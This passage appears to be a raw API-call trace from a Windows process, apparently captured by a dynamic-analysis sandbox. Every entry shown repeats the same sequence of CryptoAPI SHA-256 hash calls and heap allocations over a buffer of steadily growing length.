pbData=0x32e54940, pdwDataLen=0xcea1c) returned 1 [0146.938] CryptDestroyHash (hHash=0x332b7660) returned 1 [0146.938] CryptReleaseContext (hProv=0x7ded40, dwFlags=0x0) returned 1 [0146.938] CryptAcquireContextW (in: phProv=0xcea30, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcea30*=0x7ded40) returned 1 [0146.938] CryptCreateHash (in: hProv=0x7ded40, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcea20 | out: phHash=0xcea20) returned 1 [0146.938] CryptHashData (hHash=0x332b7d60, pbData=0x32e4a600, dwDataLen=0x700, dwFlags=0x0) returned 1 [0146.938] CryptGetHashParam (in: hHash=0x332b7d60, dwParam=0x4, pbData=0xcea1c, pdwDataLen=0xcea2c, dwFlags=0x0 | out: pbData=0xcea1c, pdwDataLen=0xcea2c) returned 1 [0146.938] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e53e30 [0146.939] CryptGetHashParam (in: hHash=0x332b7d60, dwParam=0x2, pbData=0x32e53e30, pdwDataLen=0xcea1c, dwFlags=0x0 | out: pbData=0x32e53e30, pdwDataLen=0xcea1c) returned 1 [0146.939] CryptDestroyHash (hHash=0x332b7d60) returned 1 [0146.939] CryptReleaseContext (hProv=0x7ded40, dwFlags=0x0) returned 1 [0146.939] CryptAcquireContextW (in: phProv=0xcea30, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcea30*=0x7ded40) returned 1 [0146.939] CryptCreateHash (in: hProv=0x7ded40, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcea20 | out: phHash=0xcea20) returned 1 [0146.939] CryptHashData (hHash=0x332b7660, pbData=0x32e4a600, dwDataLen=0x720, dwFlags=0x0) returned 1 [0146.939] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x4, pbData=0xcea1c, pdwDataLen=0xcea2c, dwFlags=0x0 | out: pbData=0xcea1c, pdwDataLen=0xcea2c) returned 1 [0146.939] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e499c0 [0146.939] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x2, pbData=0x32e499c0, pdwDataLen=0xcea1c, dwFlags=0x0 | out: pbData=0x32e499c0, pdwDataLen=0xcea1c) returned 1 [0146.939] CryptDestroyHash (hHash=0x332b7660) returned 1 [0146.939] CryptReleaseContext (hProv=0x7ded40, dwFlags=0x0) returned 1 [0146.939] CryptAcquireContextW (in: phProv=0xcea30, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcea30*=0x7ded40) returned 1 [0146.940] CryptCreateHash (in: hProv=0x7ded40, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcea20 | out: phHash=0xcea20) returned 1 [0146.940] CryptHashData (hHash=0x332b7660, pbData=0x32e4a600, dwDataLen=0x740, dwFlags=0x0) returned 1 [0146.940] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x4, pbData=0xcea1c, pdwDataLen=0xcea2c, dwFlags=0x0 | out: pbData=0xcea1c, pdwDataLen=0xcea2c) returned 1 [0146.940] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e57400 [0146.940] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x2, pbData=0x32e57400, pdwDataLen=0xcea1c, dwFlags=0x0 | out: pbData=0x32e57400, pdwDataLen=0xcea1c) returned 1 [0146.940] CryptDestroyHash (hHash=0x332b7660) returned 1 [0146.940] CryptReleaseContext (hProv=0x7ded40, dwFlags=0x0) returned 1 [0146.940] CryptAcquireContextW (in: phProv=0xcea30, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcea30*=0x7ded40) returned 1 [0146.941] CryptCreateHash (in: hProv=0x7ded40, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcea20 | out: phHash=0xcea20) returned 1 [0146.941] CryptHashData (hHash=0x332b7660, pbData=0x32e4a600, dwDataLen=0x760, dwFlags=0x0) returned 1 [0146.941] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x4, pbData=0xcea1c, pdwDataLen=0xcea2c, dwFlags=0x0 | out: pbData=0xcea1c, pdwDataLen=0xcea2c) returned 1 [0146.941] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e57340 [0146.941] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x2, pbData=0x32e57340, pdwDataLen=0xcea1c, dwFlags=0x0 | out: pbData=0x32e57340, pdwDataLen=0xcea1c) returned 1 [0146.941] CryptDestroyHash (hHash=0x332b7660) returned 1 [0146.941] CryptReleaseContext (hProv=0x7ded40, dwFlags=0x0) returned 1 [0146.941] CryptAcquireContextW (in: phProv=0xcea30, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcea30*=0x7ded40) returned 1 [0146.941] CryptCreateHash (in: hProv=0x7ded40, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcea20 | out: phHash=0xcea20) returned 1 [0146.941] CryptHashData (hHash=0x332b7660, pbData=0x32e4a600, dwDataLen=0x780, dwFlags=0x0) returned 1 [0146.941] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x4, pbData=0xcea1c, pdwDataLen=0xcea2c, dwFlags=0x0 | out: pbData=0xcea1c, pdwDataLen=0xcea2c) returned 1 [0146.941] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e57a00 [0146.941] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x2, pbData=0x32e57a00, pdwDataLen=0xcea1c, dwFlags=0x0 | out: pbData=0x32e57a00, pdwDataLen=0xcea1c) returned 1 [0146.941] CryptDestroyHash (hHash=0x332b7660) returned 1 [0146.941] CryptReleaseContext (hProv=0x7ded40, dwFlags=0x0) returned 1 [0146.942] CryptAcquireContextW (in: phProv=0xcea30, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcea30*=0x7ded40) returned 1 [0146.942] CryptCreateHash (in: hProv=0x7ded40, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcea20 | out: phHash=0xcea20) returned 1 [0146.942] CryptHashData (hHash=0x332b7660, pbData=0x32e4a600, dwDataLen=0x7a0, dwFlags=0x0) returned 1 [0146.942] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x4, pbData=0xcea1c, pdwDataLen=0xcea2c, dwFlags=0x0 | out: pbData=0xcea1c, pdwDataLen=0xcea2c) returned 1 [0146.942] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e575b0 [0146.942] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x2, pbData=0x32e575b0, pdwDataLen=0xcea1c, dwFlags=0x0 | out: pbData=0x32e575b0, pdwDataLen=0xcea1c) returned 1 [0146.942] CryptDestroyHash (hHash=0x332b7660) returned 1 [0146.942] CryptReleaseContext (hProv=0x7ded40, dwFlags=0x0) returned 1 [0146.942] CryptAcquireContextW (in: phProv=0xcea30, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcea30*=0x7ded40) returned 1 [0146.943] CryptCreateHash (in: hProv=0x7ded40, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcea20 | out: phHash=0xcea20) returned 1 [0146.943] CryptHashData (hHash=0x332b7d60, pbData=0x32e4a600, dwDataLen=0x7c0, dwFlags=0x0) returned 1 [0146.943] CryptGetHashParam (in: hHash=0x332b7d60, dwParam=0x4, pbData=0xcea1c, pdwDataLen=0xcea2c, dwFlags=0x0 | out: pbData=0xcea1c, pdwDataLen=0xcea2c) returned 1 [0146.943] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e570a0 [0146.943] CryptGetHashParam (in: hHash=0x332b7d60, dwParam=0x2, pbData=0x32e570a0, pdwDataLen=0xcea1c, dwFlags=0x0 | out: pbData=0x32e570a0, pdwDataLen=0xcea1c) returned 1 [0146.943] CryptDestroyHash (hHash=0x332b7d60) returned 1 [0146.943] CryptReleaseContext (hProv=0x7ded40, dwFlags=0x0) returned 1 [0146.943] CryptAcquireContextW (in: phProv=0xcea30, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcea30*=0x7ded40) returned 1 [0146.943] CryptCreateHash (in: hProv=0x7ded40, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcea20 | out: phHash=0xcea20) returned 1 [0146.943] CryptHashData (hHash=0x332b7660, pbData=0x32e4a600, dwDataLen=0x7e0, dwFlags=0x0) returned 1 [0146.943] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x4, pbData=0xcea1c, pdwDataLen=0xcea2c, dwFlags=0x0 | out: pbData=0xcea1c, pdwDataLen=0xcea2c) returned 1 [0146.943] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e572e0 [0146.944] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x2, pbData=0x32e572e0, pdwDataLen=0xcea1c, dwFlags=0x0 | out: pbData=0x32e572e0, pdwDataLen=0xcea1c) returned 1 [0146.944] CryptDestroyHash (hHash=0x332b7660) returned 1 [0146.944] CryptReleaseContext (hProv=0x7ded40, dwFlags=0x0) returned 1 [0146.944] CryptAcquireContextW (in: phProv=0xcea30, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcea30*=0x7ded40) returned 1 [0146.944] CryptCreateHash (in: hProv=0x7ded40, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcea20 | out: phHash=0xcea20) returned 1 [0146.944] CryptHashData (hHash=0x332b7660, pbData=0x32e4a600, dwDataLen=0x800, dwFlags=0x0) returned 1 [0146.944] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x4, pbData=0xcea1c, pdwDataLen=0xcea2c, dwFlags=0x0 | out: pbData=0xcea1c, pdwDataLen=0xcea2c) returned 1 [0146.944] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e575e0 [0146.944] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x2, pbData=0x32e575e0, pdwDataLen=0xcea1c, dwFlags=0x0 | out: pbData=0x32e575e0, pdwDataLen=0xcea1c) returned 1 [0146.944] CryptDestroyHash (hHash=0x332b7660) returned 1 [0146.944] CryptReleaseContext (hProv=0x7ded40, dwFlags=0x0) returned 1 [0146.944] CryptAcquireContextW (in: phProv=0xcea30, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcea30*=0x7ded40) returned 1 [0146.945] CryptCreateHash (in: hProv=0x7ded40, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcea20 | out: phHash=0xcea20) returned 1 [0146.945] CryptHashData (hHash=0x332b7660, pbData=0x32e4a600, dwDataLen=0x820, dwFlags=0x0) returned 1 [0146.945] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x4, pbData=0xcea1c, pdwDataLen=0xcea2c, dwFlags=0x0 | out: pbData=0xcea1c, pdwDataLen=0xcea2c) returned 1 [0146.945] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e57760 [0146.945] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x2, pbData=0x32e57760, pdwDataLen=0xcea1c, dwFlags=0x0 | out: pbData=0x32e57760, pdwDataLen=0xcea1c) returned 1 [0146.945] CryptDestroyHash (hHash=0x332b7660) returned 1 [0146.945] CryptReleaseContext (hProv=0x7ded40, dwFlags=0x0) returned 1 [0146.945] CryptAcquireContextW (in: phProv=0xcea30, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcea30*=0x7ded40) returned 1 [0146.945] CryptCreateHash (in: hProv=0x7ded40, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcea20 | out: phHash=0xcea20) returned 1 [0146.946] CryptHashData (hHash=0x332b7660, pbData=0x32e4a600, dwDataLen=0x840, dwFlags=0x0) returned 1 [0146.946] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x4, pbData=0xcea1c, pdwDataLen=0xcea2c, dwFlags=0x0 | out: pbData=0xcea1c, pdwDataLen=0xcea2c) returned 1 [0146.946] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e56f20 [0146.946] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x2, pbData=0x32e56f20, pdwDataLen=0xcea1c, dwFlags=0x0 | out: pbData=0x32e56f20, pdwDataLen=0xcea1c) returned 1 [0146.946] CryptDestroyHash (hHash=0x332b7660) returned 1 [0146.946] CryptReleaseContext (hProv=0x7ded40, dwFlags=0x0) returned 1 [0146.946] CryptAcquireContextW (in: phProv=0xcea30, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcea30*=0x7ded40) returned 1 [0146.946] CryptCreateHash (in: hProv=0x7ded40, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcea20 | out: phHash=0xcea20) returned 1 [0146.946] CryptHashData (hHash=0x332b7660, pbData=0x32e4a600, dwDataLen=0x860, dwFlags=0x0) returned 1 [0146.946] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x4, pbData=0xcea1c, pdwDataLen=0xcea2c, dwFlags=0x0 | out: pbData=0xcea1c, pdwDataLen=0xcea2c) returned 1 [0146.946] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e57700 [0146.946] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x2, pbData=0x32e57700, pdwDataLen=0xcea1c, dwFlags=0x0 | out: pbData=0x32e57700, pdwDataLen=0xcea1c) returned 1 [0146.946] CryptDestroyHash (hHash=0x332b7660) returned 1 [0146.946] CryptReleaseContext (hProv=0x7ded40, dwFlags=0x0) returned 1 [0146.946] CryptAcquireContextW (in: phProv=0xcea30, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcea30*=0x7ded40) returned 1 [0146.947] CryptCreateHash (in: hProv=0x7ded40, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcea20 | out: phHash=0xcea20) returned 1 [0146.947] CryptHashData (hHash=0x332b7d60, pbData=0x32e4a600, dwDataLen=0x880, dwFlags=0x0) returned 1 [0146.947] CryptGetHashParam (in: hHash=0x332b7d60, dwParam=0x4, pbData=0xcea1c, pdwDataLen=0xcea2c, dwFlags=0x0 | out: pbData=0xcea1c, pdwDataLen=0xcea2c) returned 1 [0146.947] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e571f0 [0146.947] CryptGetHashParam (in: hHash=0x332b7d60, dwParam=0x2, pbData=0x32e571f0, pdwDataLen=0xcea1c, dwFlags=0x0 | out: pbData=0x32e571f0, pdwDataLen=0xcea1c) returned 1 [0146.947] CryptDestroyHash (hHash=0x332b7d60) returned 1 [0146.947] CryptReleaseContext (hProv=0x7ded40, dwFlags=0x0) returned 1 [0146.947] CryptAcquireContextW (in: phProv=0xcea30, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcea30*=0x7ded40) returned 1 [0146.948] CryptCreateHash (in: hProv=0x7ded40, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcea20 | out: phHash=0xcea20) returned 1 [0146.948] CryptHashData (hHash=0x332b7660, pbData=0x32e4a600, dwDataLen=0x8a0, dwFlags=0x0) returned 1 [0146.948] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x4, pbData=0xcea1c, pdwDataLen=0xcea2c, dwFlags=0x0 | out: pbData=0xcea1c, pdwDataLen=0xcea2c) returned 1 [0146.948] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e57520 [0146.948] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x2, pbData=0x32e57520, pdwDataLen=0xcea1c, dwFlags=0x0 | out: pbData=0x32e57520, pdwDataLen=0xcea1c) returned 1 [0146.948] CryptDestroyHash (hHash=0x332b7660) returned 1 [0146.948] CryptReleaseContext (hProv=0x7ded40, dwFlags=0x0) returned 1 [0146.948] CryptAcquireContextW (in: phProv=0xcea30, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcea30*=0x7ded40) returned 1 [0146.948] CryptCreateHash (in: hProv=0x7ded40, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcea20 | out: phHash=0xcea20) returned 1 [0146.948] CryptHashData (hHash=0x332b7890, pbData=0x32e4a600, dwDataLen=0x8c0, dwFlags=0x0) returned 1 [0146.948] CryptGetHashParam (in: hHash=0x332b7890, dwParam=0x4, pbData=0xcea1c, pdwDataLen=0xcea2c, dwFlags=0x0 | out: pbData=0xcea1c, pdwDataLen=0xcea2c) returned 1 [0146.949] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e57610 [0146.949] CryptGetHashParam (in: hHash=0x332b7890, dwParam=0x2, pbData=0x32e57610, pdwDataLen=0xcea1c, dwFlags=0x0 | out: pbData=0x32e57610, pdwDataLen=0xcea1c) returned 1 [0146.949] CryptDestroyHash (hHash=0x332b7890) returned 1 [0146.949] CryptReleaseContext (hProv=0x7ded40, dwFlags=0x0) returned 1 [0146.949] CryptAcquireContextW (in: phProv=0xcea30, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcea30*=0x7ded40) returned 1 [0146.949] CryptCreateHash (in: hProv=0x7ded40, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcea20 | out: phHash=0xcea20) returned 1 [0146.949] CryptHashData (hHash=0x332b7ac0, pbData=0x32e4a600, dwDataLen=0x8e0, dwFlags=0x0) returned 1 [0146.949] CryptGetHashParam (in: hHash=0x332b7ac0, dwParam=0x4, pbData=0xcea1c, pdwDataLen=0xcea2c, dwFlags=0x0 | out: pbData=0xcea1c, pdwDataLen=0xcea2c) returned 1 [0146.949] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e57670 [0146.949] CryptGetHashParam (in: hHash=0x332b7ac0, dwParam=0x2, pbData=0x32e57670, pdwDataLen=0xcea1c, dwFlags=0x0 | out: pbData=0x32e57670, pdwDataLen=0xcea1c) returned 1 [0146.949] CryptDestroyHash (hHash=0x332b7ac0) returned 1 [0146.949] CryptReleaseContext (hProv=0x7ded40, dwFlags=0x0) returned 1 [0146.949] CryptAcquireContextW (in: phProv=0xcea30, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcea30*=0x7ded40) returned 1 [0146.950] CryptCreateHash (in: hProv=0x7ded40, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcea20 | out: phHash=0xcea20) returned 1 [0146.950] CryptHashData (hHash=0x332b7660, pbData=0x32e4a600, dwDataLen=0x900, dwFlags=0x0) returned 1 [0146.950] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x4, pbData=0xcea1c, pdwDataLen=0xcea2c, dwFlags=0x0 | out: pbData=0xcea1c, pdwDataLen=0xcea2c) returned 1 [0146.950] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e57820 [0146.950] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x2, pbData=0x32e57820, pdwDataLen=0xcea1c, dwFlags=0x0 | out: pbData=0x32e57820, pdwDataLen=0xcea1c) returned 1 [0146.950] CryptDestroyHash (hHash=0x332b7660) returned 1 [0146.950] CryptReleaseContext (hProv=0x7ded40, dwFlags=0x0) returned 1 [0146.950] CryptAcquireContextW (in: phProv=0xcea30, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcea30*=0x7ded40) returned 1 [0146.951] CryptCreateHash (in: hProv=0x7ded40, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcea20 | out: phHash=0xcea20) returned 1 [0146.951] CryptHashData (hHash=0x332b7660, pbData=0x32e4a600, dwDataLen=0x920, dwFlags=0x0) returned 1 [0146.951] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x4, pbData=0xcea1c, pdwDataLen=0xcea2c, dwFlags=0x0 | out: pbData=0xcea1c, pdwDataLen=0xcea2c) returned 1 [0146.951] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e57010 [0146.951] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x2, pbData=0x32e57010, pdwDataLen=0xcea1c, dwFlags=0x0 | out: pbData=0x32e57010, pdwDataLen=0xcea1c) returned 1 [0146.951] CryptDestroyHash (hHash=0x332b7660) returned 1 [0146.951] CryptReleaseContext (hProv=0x7ded40, dwFlags=0x0) returned 1 [0146.951] CryptAcquireContextW (in: phProv=0xcea30, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcea30*=0x7ded40) returned 1 [0146.951] CryptCreateHash (in: hProv=0x7ded40, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcea20 | out: phHash=0xcea20) returned 1 [0146.951] CryptHashData (hHash=0x332b7660, pbData=0x32e4a600, dwDataLen=0x940, dwFlags=0x0) returned 1 [0146.951] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x4, pbData=0xcea1c, pdwDataLen=0xcea2c, dwFlags=0x0 | out: pbData=0xcea1c, pdwDataLen=0xcea2c) returned 1 [0146.951] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e57790 [0146.951] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x2, pbData=0x32e57790, pdwDataLen=0xcea1c, dwFlags=0x0 | out: pbData=0x32e57790, pdwDataLen=0xcea1c) returned 1 [0146.951] CryptDestroyHash (hHash=0x332b7660) returned 1 [0146.951] CryptReleaseContext (hProv=0x7ded40, dwFlags=0x0) returned 1 [0146.951] CryptAcquireContextW (in: phProv=0xcea30, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcea30*=0x7ded40) returned 1 [0146.952] CryptCreateHash (in: hProv=0x7ded40, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcea20 | out: phHash=0xcea20) returned 1 [0146.952] CryptHashData (hHash=0x332b7660, pbData=0x32e4a600, dwDataLen=0x960, dwFlags=0x0) returned 1 [0146.952] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x4, pbData=0xcea1c, pdwDataLen=0xcea2c, dwFlags=0x0 | out: pbData=0xcea1c, pdwDataLen=0xcea2c) returned 1 [0146.952] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e573d0 [0146.952] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x2, pbData=0x32e573d0, pdwDataLen=0xcea1c, dwFlags=0x0 | out: pbData=0x32e573d0, pdwDataLen=0xcea1c) returned 1 [0146.952] CryptDestroyHash (hHash=0x332b7660) returned 1 [0146.952] CryptReleaseContext (hProv=0x7ded40, dwFlags=0x0) returned 1 [0146.952] CryptAcquireContextW (in: phProv=0xcea30, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcea30*=0x7ded40) returned 1 [0146.953] CryptCreateHash (in: hProv=0x7ded40, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcea20 | out: phHash=0xcea20) returned 1 [0146.953] CryptHashData (hHash=0x332b7d60, pbData=0x32e4a600, dwDataLen=0x980, dwFlags=0x0) returned 1 [0146.953] CryptGetHashParam (in: hHash=0x332b7d60, dwParam=0x4, pbData=0xcea1c, pdwDataLen=0xcea2c, dwFlags=0x0 | out: pbData=0xcea1c, pdwDataLen=0xcea2c) returned 1 [0146.953] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e56fe0 [0146.953] CryptGetHashParam (in: hHash=0x332b7d60, dwParam=0x2, pbData=0x32e56fe0, pdwDataLen=0xcea1c, dwFlags=0x0 | out: pbData=0x32e56fe0, pdwDataLen=0xcea1c) returned 1 [0146.953] CryptDestroyHash (hHash=0x332b7d60) returned 1 [0146.953] CryptReleaseContext (hProv=0x7ded40, dwFlags=0x0) returned 1 [0146.953] CryptAcquireContextW (in: phProv=0xcea30, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcea30*=0x7ded40) returned 1 [0146.953] CryptCreateHash (in: hProv=0x7ded40, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcea20 | out: phHash=0xcea20) returned 1 [0146.953] CryptHashData (hHash=0x332b7660, pbData=0x32e4a600, dwDataLen=0x9a0, dwFlags=0x0) returned 1 [0146.953] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x4, pbData=0xcea1c, pdwDataLen=0xcea2c, dwFlags=0x0 | out: pbData=0xcea1c, pdwDataLen=0xcea2c) returned 1 [0146.953] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e57430 [0146.953] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x2, pbData=0x32e57430, pdwDataLen=0xcea1c, dwFlags=0x0 | out: pbData=0x32e57430, pdwDataLen=0xcea1c) returned 1 [0146.954] CryptDestroyHash (hHash=0x332b7660) returned 1 [0146.954] CryptReleaseContext (hProv=0x7ded40, dwFlags=0x0) returned 1 [0146.954] CryptAcquireContextW (in: phProv=0xcea30, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcea30*=0x7ded40) returned 1 [0146.954] CryptCreateHash (in: hProv=0x7ded40, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcea20 | out: phHash=0xcea20) returned 1 [0146.954] CryptHashData (hHash=0x332b7660, pbData=0x32e4a600, dwDataLen=0x9c0, dwFlags=0x0) returned 1 [0146.954] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x4, pbData=0xcea1c, pdwDataLen=0xcea2c, dwFlags=0x0 | out: pbData=0xcea1c, pdwDataLen=0xcea2c) returned 1 [0146.954] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e57550 [0146.954] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x2, pbData=0x32e57550, pdwDataLen=0xcea1c, dwFlags=0x0 | out: pbData=0x32e57550, pdwDataLen=0xcea1c) returned 1 [0146.954] CryptDestroyHash (hHash=0x332b7660) returned 1 [0146.954] CryptReleaseContext (hProv=0x7ded40, dwFlags=0x0) returned 1 [0146.954] CryptAcquireContextW (in: phProv=0xcea30, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcea30*=0x7ded40) returned 1 [0146.955] CryptCreateHash (in: hProv=0x7ded40, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcea20 | out: phHash=0xcea20) returned 1 [0146.955] CryptHashData (hHash=0x332b7660, pbData=0x32e4a600, dwDataLen=0x9e0, dwFlags=0x0) returned 1 [0146.955] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x4, pbData=0xcea1c, pdwDataLen=0xcea2c, dwFlags=0x0 | out: pbData=0xcea1c, pdwDataLen=0xcea2c) returned 1 [0146.955] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e57a30 [0146.955] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x2, pbData=0x32e57a30, pdwDataLen=0xcea1c, dwFlags=0x0 | out: pbData=0x32e57a30, pdwDataLen=0xcea1c) returned 1 [0146.955] CryptDestroyHash (hHash=0x332b7660) returned 1 [0146.955] CryptReleaseContext (hProv=0x7ded40, dwFlags=0x0) returned 1 [0146.955] CryptAcquireContextW (in: phProv=0xcea30, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcea30*=0x7ded40) returned 1 [0146.956] CryptCreateHash (in: hProv=0x7ded40, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcea20 | out: phHash=0xcea20) returned 1 [0146.956] CryptHashData (hHash=0x332b7660, pbData=0x32e4a600, dwDataLen=0xa00, dwFlags=0x0) returned 1 [0146.956] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x4, pbData=0xcea1c, pdwDataLen=0xcea2c, dwFlags=0x0 | out: pbData=0xcea1c, pdwDataLen=0xcea2c) returned 1 [0146.956] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e57ac0 [0146.956] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x2, pbData=0x32e57ac0, pdwDataLen=0xcea1c, dwFlags=0x0 | out: pbData=0x32e57ac0, pdwDataLen=0xcea1c) returned 1 [0146.956] CryptDestroyHash (hHash=0x332b7660) returned 1 [0146.956] CryptReleaseContext (hProv=0x7ded40, dwFlags=0x0) returned 1 [0146.956] CryptAcquireContextW (in: phProv=0xcea30, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcea30*=0x7ded40) returned 1 [0146.957] CryptCreateHash (in: hProv=0x7ded40, Algid=0x800c, hKey=0x0, dwFlags=0x0, 